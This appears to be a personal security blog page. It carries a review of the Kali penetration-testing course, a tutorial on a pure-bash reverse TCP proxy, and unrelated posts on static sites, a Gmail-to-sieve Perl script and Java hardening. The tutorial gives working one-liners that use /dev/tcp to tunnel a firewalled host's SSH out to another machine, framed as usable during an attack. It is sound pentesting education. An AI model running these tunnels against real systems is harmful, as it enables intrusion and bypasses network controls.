Pentesting With Kali

Review: Penetration Testing With Kali Linux

The web page for the class states “Penetration Testing with Kali Linux is an entry-level course …” For a few years I had ruled out taking the PWB (now PWK) class specifically because of that statement. I was also told on good authority that I would be done with the class in only a few days. I thought, okay whatever, maybe I’ll pick something up but at least I get a few CPE’s in the process to feed the other cert that I’ve bothered to maintain. I came into this class seriously underestimating what it was all about.

So about the course. The material is good, better than most, you recieve a (PDF) book, and series of videos, you are also provided RDP access to a Windows client in the lab for working on some of the exercises. The exercises are very clear, and if you pay attention and follow along, you will be writing your own exploits from scratch in no time. I was actually surprised about how easy and how clear that they made some of the topics. But really, it is very much like any other training class. Until you get to the labs.

The offsec labs really set this course apart. There are many more challenges than I expected. I was anticipating half a dozen, maybe a few more machines to exploit, but no. More. A lot more. Over the course of a few months I compromised more than forty machines in the labs, and I still had more to go. I would have liked to keep going, but I needed to get back to having a life; I liken the offsec labs very much to the best video game ever. It’s addicting, be warned.

Finally, the last part of the course was the certification challenge. Twenty-four hours to perform and report on a pen-test of a small network of machines with no prior-knowledge of the challenge. No vulnerability scanners and no autopwn allowed. It was exactly as difficult as I expected, having worked through most of the labs I was ready—very ready—and didn’t need the full time allotted. That said, by the time I was done I was tired, and glad that I started with the hardest challenges working towards the easier—I was making mistakes by the end that would have likely changed the outcome if I had worked from easy to hard.

Entry level course? Sort-of. The class covers the basics. But getting through the labs requires not just an understanding, but mastery of the basics; so ya the class is entry-level in that sense, but getting root on every machine in the lab is far from basic. My goal was to get everything on the larger “public” network in the labs, and I fell short by one system. Unless you are already very good, and some of the students I met on IRC were, expect to need a lot of lab time. If you are serious about getting the certification, then just start out with as much lab time as you can afford.

Some Advice For Surviving the Labs

Organization is the key to getting through this course. Not only for getting through the work, but the documentation requirement. Keeping all this organized in your head is hard enough, putting it into a report, well that’s where the money is. My advice is to keep good notes. Not just good notes, but print-ready notes. Having notes that are already formatted for your final report will save you hours and hours (days?) of work at the end of the course. I tried using many different programs for this, from the suggested keepnote (great for taking notes, but atrocious for getting them out and into a report,) to evernote, onenote, and I finally settled on using Curio.

Backups are a very good idea. I would suggest going even further and to use a full-blown revision control system, git, svn, whatever. Put everything you do related to the course into it. It will be huge, but being able to un-do mistakes, or bring up a new Kali image in the cloud and have everything synced up quickly is worth the trouble.

Running Kali: I tried a lot of different ways of running Kali, local VM, in the cloud, and finally settled on running it on bare metal. I did this because I wanted to be able to work from anywhere, desktop, laptop, work computer etc. And carrying around my VM on a USB stick isn’t great. Running it in the cloud is easy (just install whatever Debian-7 image the provider has, change your repositories and you have Kali on whatever VPS hosting provider,) but high memory and powerful CPU servers are expensive. Bare metal was the best. I setup OpenVPN, and X2go to supplement using SSH with Socks for my browser. X2go works great, except there is a key-mapping problem when using the Mac client with Gnome—LXDE doesn’t have that problem. Fonts look pretty awful by default in Debian, and this carries over to Kali; using X2go makes it even more obvious, so taking a few extra minutes to setup infinality for rendering will make it look nice and smooth. The other trick is to use a tiling terminal, I prefer iterm2 for my mac, and terminator on Linux. Either allow you to setup pre-defined window arrangements, so you can have the same arrangement up and running … ssh’ed in, msfconsole, htop, vpn connection, all ready to go with a couple of clicks. Between X2go, iterm2 window sets, and a git repository I was able to pick up my work from anywhere in just a few minutes.

Vulnerability scanners (nessus, nexpose, openvas, saint etc.): don’t bother. If you want to learn how to use them, the lab isn’t a bad place, but you don’t gain any advantage by using them in the labs. More likely you will just annoy other students by consuming resources on a lab target that they are working on. More than once I had to deal with someone trying to bruteforce a login password which effectively DoS’ed the machine I was working on.

Metasploit … use it. But most importantly, use it correctly. Metasploit is a bit notorious for making complicated exploits and attacks easy. Yes, it does that, but that’s not where, in my opinion, it shows it’s strengths. Really metasploit has transformed pen-testing. The most important aspect in this class is 1) that it integrates the tools it provides with a database, and is a great resource for storing raw information about the attacks. And 2) it provides so many ancillary tools: encoders, payloads, post-exploitation tools, and pivoting, well the pivoting is pretty awesome. There is some confusion amongst new students working through the labs, that metasploit should be avoided. Mostly because there are specific rules of engagement on the exam regarding the scope of its use. Don’t be afraid to use it, but any part of it that you use you should be able to perform on your own, pivot, post, etc. That’s another philosophical area where I overlapped directly with the offsec course’s core tenants … if you are using a tool, you should be able to perform what it is that the tools can do, without the tool. (I admit however, writing my own staged shellcode by hand is a bit beyond my capabilities, so I’m not quite to where I’d like to be.)

Exploits: Keep track of the exploits that you use throughout the course, and manage them in a way that you know what it does, where it came from, and what modifications you made. I used a naming scheme like wnt.w2k8-local-2013-2660-edb25912-epathobj-system.cmd.exe ya it’s long, but I know what OS, that it’s a priv escalation exploit, the cve, where I downloaded it (exploit db number) and the modifications I made (in this case it’s been modified to run cmd.exe using system() instead of the ShellExecute function.) Serve these up from your web root so they are easily accessible in the labs. My advice, is to go and download the most popular exploits at the beginning of the course, and have them ready for use. There’s a number printed between the exploit description and platform on the search results page on exploit-db.com, that represents how many times it’s been downloaded—that is a good indicator of what exploits are likely to be your best bets.

IRC … as you work through the labs, use the IRC channel. Meet your peers, make some friends, maybe learn a new technique or two.

Wicked Cool Reverse Proxy With Bash and Netcat

There are a lot of guides out there that show how to do various cool tricks using netcat. One thing that I recently came across is the situation where I could execute a command on a remote system, but had no write permissions to the file system. There was a copy of nc on the host, and being an older Unix it had only had bash 3 (though this technique also applies to later versions of bash too.) I put together this technique to get a reverse-proxy connection; I doubt this is anything new, but my searches didn’t turn anything up on how to do this so I figure it’s worth sharing.

The goal was to be able to ssh into the machine, which was behind a firewall. It had outbound access on port 80 but was otherwise pretty restricted. No filesystem write access, older version of bash (no coprocesses),

FIFO redirection

Just about every example you can find on how to perform a reverse proxy connection with netcat makes the assumption that you can write a unix FIFO (named pipe.) Obviously, this requires creating a file. And without being able to do so it becomes difficult to get all of the IO done right.

bash has extensive IO features

One way of dealing with this is to use several features of bash:

  • Un-named pipes (basically everything we are doing here is using an un-named pipe.)
  • File descriptors, you are probably familiar with 0, 1, and 2 (STDIN, STOUT, and STDERR respectively) but bash allows for the creation of additional descriptors which can be assigned a number above 2.
  • Network file descriptors: bash has a really cool feature, where it will treat a network socket as a file descriptor. You just reference the file /dev/tcp/hostname/port for example, ssh on localhost is /dev/tcp/127.0.0.1/22
  • Process substitution. It’s one way (of several) that allows running subshells without using quotes or backticks (pretty useful to help with escaping problems when doing this over HTTP and pushing through a SQL Injection hole.)

How to reverse-proxy a local service without using a named pipe:

If you want to proxy SSH connections from your target using an outbound connection to port 80 on your system, the command is:

1
nohup bash <(exec 3<>/dev/tcp/localhost/22 && nc 10.0.0.1 80 0<&3 1>&3) &>/dev/null &
  • The <( ) part runs the command in a subprocess, you could accomplish the same using bash -c, or backticks, etc.
  • exec 3<>/dev/tcp/localhost/22 creates a bidirectional filehandle (named 3) and associates it with a TCP socket to the local SSH daemon. The IO filehandle is necessary because multiple redirections need to take place within a single command.
  • Then connect STDIN and STDOUT of netcat which connects outbound on port 80.

And on the local system, you can do this (since we can write named pipes locally, I use them here.):

1
2
mkfifo catpipe
nc -l -p 80 0<catpipe |nc -l -p 2222 >catpipe

Then you simply ssh to yourself:

1
ssh -p 2222 user@localhost

Neat trick eh?

And then I realized …

Netcat isn’t even needed on the remote side! Really, what is netcat but cat with the ability to treat sockets as filehandles? So taking it a step further: pure bash reverse TCP proxy! Don’t need to write to the filesystem, doesn’t use any quotes, and can be fired off as a one-liner.

1
2
exec 3<>/dev/tcp/localhost/22 && exec 4<>/dev/tcp/10.0.0.1/80 && \
  bash <(cat 0<&3 1>&4 & ) && cat 0<&4 1>&3

Note: the line break here is added for readbility, but this would be a one-liner during the attack … and if you needed to disassociate from the process that called the command (say if the web server, or whatever,) has a low command timeout: this time with no line breaks

1
nohup bash <( exec 3<>/dev/tcp/localhost/22 && exec 4<>/dev/tcp/10.0.0.1/80 && bash <(cat 0<&3 1>&4 & ) && cat 0<&4 1>&3 ) &>/dev/null &

The first cat statement needs to be put in the background (the second doesn’t necessarily, but if we do we don’t run into any syntax problems with using an ampersand.) I’m doing this as a one-liner (using logical-and’s to string it all together,) so I run it as a subprocess and put it in the background within the subprocess. If you can provide multiple commands, then it gets easier.

I love unix.

zsh seems to have the same abilities (filehandles and TCP file descriptors.)

Goodbye Wordpress

Everything old is new.

Technology trends are cyclic, and sometimes we backtrack to ideas from the past that have fallen out of favor. Static site generators are a good example. They are starting to gain popularity again, the difference is that 10 years ago most sucked and looked pretty awful (also ironic is the trend of many sites returning to single column text, minimal formatting, of course the fonts and layout are nicer than what we had in the mid-90’s.) I’ve decided to jump on the bandwagon too. I’m tired of dealing with scores of automated attacks, maintaining databases, PHP, blah blah blah … all for a site that 1) generates no revenue 2) only has a few thousand visitors a month, and 3) I don’t contribute to on a regular basis.

I also made a few decisions based on traffic I receive. Almost all of my visitors land from search engines and are only interested in one topic, then move on. So really why clutter up the interface with navigation, and other nonsense that’s difficult to cull from a wordpress theme?

I am also ditching comments. For a few reasons, but keeping Spam out of the comments meant requiring every comment to be approved (despite some very capable plugins that caught most of the junk.) And I really wanted to remove all server-side processing on the site. Sure, there’s Disqus, but let’s be honest about what the internet has become … when a service is free on the Internet you are the product. How does Disqus make money? By tracking the visitors to websites that have it embedded, and selling that information to advertisers. It’s the same annoyance I have with most social sites.

So, I am trying out Octopress. In terms of how difficult it is to use, it’s definitely more complex, but it also drastically simplifies the maintenance of having a blog. I am not saddled with a database, frequently checking for security updates, worrying about plugins getting out of date, putting a caching layer in front of what is essentially static content, and scripting backups. I can use simple tools (vim, git, and ssh) to do most of the work and I can free up memory on my VPS for other things that I think are more important.

I’ll follow up with another post on where I ended up on my wordpress configuration, with a few tips on adding extra layers of security. There are some effective tricks I learned for locking it down that will be useful to others.

Moving Off of Gmail? What About All Those Filter Rules?

So, for one reason or another, I decided that I was going to move away from gmail.  It’s easy to underestimate the massive pain that is running a mail server, especially if you expect anti-spam, ant-virus, and the thousand (seemingly so at least) other features that are offered for free from most web mail providers. There’s a good chance that people doing the same thing (abandoning gmail that is,) will eventually find that it has been decided that dovecot and sieve will feature heavily in whatever setup they decide upon.  And if they are anything like me, they filter a significant portion of their mail into gmail’s equivalent of IMAP folders (tags.) In my case, I didn’t want (despite the probability that most of the rules are stale) to recreate all of these rules by hand.  It’s fortunate that Google allows the rules to be exported as XML (though actual sieve rules would have been better!)  A quick search didn’t turn up any tools to convert from one to the other, so I threw together a (admittedly poorly written) PERL script.  And to think, I had promised to stop using PERL and move to Ruby for one-off little scripts like this, perhaps a decent new-years resolution?
(googleMailFilters.pl) download
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
#!perl
use XML::Simple;
use Data::Dumper;
$xml = new XML::Simple;
$data = $xml->XMLin("mailFilters.xml");
# Build hashes of arrays one for each type (to, from, subject) with the destination as key, and search values as array values
%from = ();
foreach $filter (keys %{$data->{entry}}){
	push @{$from{$data->{entry}->{$filter}->{"apps:property"}->{"label"}->{"value"}}}, $data->{entry}->{$filter}->{"apps:property"}->{"from"}->{"value"}
	if ( length($data->{entry}->{$filter}->{"apps:property"}->{"from"}->{"value"}) > 0 && length($data->{entry}->{$filter}->{"apps:property"}->{"label"}->{"value"}) > 0);
}
%to = ();
foreach $filter (keys %{$data->{entry}}){
        push @{$to{$data->{entry}->{$filter}->{"apps:property"}->{"label"}->{"value"}}}, $data->{entry}->{$filter}->{"apps:property"}->{"to"}->{"value"}
           if ( length($data->{entry}->{$filter}->{"apps:property"}->{"to"}->{"value"}) > 0 && length($data->{entry}->{$filter}->{"apps:property"}->{"label"}->{"value"}) > 0);
}
%subject = ();
foreach $filter (keys %{$data->{entry}}){
        push @{$subject{$data->{entry}->{$filter}->{"apps:property"}->{"label"}->{"value"}}}, $data->{entry}->{$filter}->{"apps:property"}->{"subject"}->{"value"}
           if ( length($data->{entry}->{$filter}->{"apps:property"}->{"subject"}->{"value"}) > 0 && length($data->{entry}->{$filter}->{"apps:property"}->{"label"}->{"value"}) > 0);
}
# Print out sieve rules from our hashes:
print "require [\"fileinto\"];\n";
foreach $rule (keys %from){
	print "\n# rule:[from-$rule]\n";
	print "if any of (";
	$i=0;
	foreach $value (@{$from{$rule}}){
		print ",\n\t" if $i>0;
		print "header :contains \"From\" \"$value\"";
		$i++;
	}
	print " )\n\t{\n\t\tfileinto \"$rule\";\n\t}\n"
}
foreach $rule (keys %to){
        print "\n# rule:[to-$rule]\n";
        print "if any of (";
        $i=0;
        foreach $value (@{$to{$rule}}){
                print ",\n\t" if $i>0;
                print "header :contains \"To\" \"$value\"";
                $i++;
        }
        print " )\n\t{\n\t\tfileinto \"$rule\";\n\t}\n"
}
foreach $rule (keys %subject){
        print "\n# rule:[subject-$rule]\n";
        print "if any of (";
        $i=0;
        foreach $value (@{$subject{$rule}}){
                print ",\n\t" if $i>0;
                print "header :contains \"Subject\" \"$value\"";
                $i++;
        }
        print " )\n\t{\n\t\tfileinto \"$rule\";\n\t}\n"
}

Making Java (Slightly) Safer on Windows

Here’s a suggestion that can make it a little safer to run the Java plugin in your web browser on Windows (Vista, Win 7, and Win 8–but not XP.)  This doesn’t stop exploits, and is probably not entirely effective, but it can stop some bad things from happening.  Don’t be fooled into feeling safe by doing this, it’s just one additional layer, but could stop your system from being fully-compromised. Windows includes a feature called mandatory integrity controls that imposes an extra layer of protection on top of the discretionary access controls provided by the operating system.  It is a (very) simple method of preventing write access to items with a higher security level label.  There are several levels defined: Anonymous, Low, Medium, High, and System.  Mandatory integrity controls are one of the many features that makes Google Chrome’s sandbox possible. One of the first thing that many Java exploits perform is to grab a dropper, save it to the filesystem, and execute it.  In most cases by running Java running with low integrity (this is easy for malware authors to work around though,) will short circuit the download.  Also important is that child processes will inherit the integrity label, so if the malware was smart enough to drop the bot or whatever it grabbed into a location with a “low” label, the bot will execute with low permissions.  This will stop it from being persistent, writing to browser settings, copying itself to system folders and so on. The downsides?  the “Low” label still allows reading of files and information labeled as “Medium” or higher, relying on discretionary access controls.  Another downside, is this will probably break any complex Java applet.  I was still able to run most of the stuff I came across, it’s just when trying to write files that things get denied.  Another thing is that you probably don’t want to change the java.exe program itself if you use any Java applications, but this isn’t really a problem because Internet Explorer uses a helper executable to launch the program “jp2launcher.exe”, and as mentioned before it will inherit the “Low” label on execution. Here’s how to run the Java browser plugin as Low integrity: Read full post →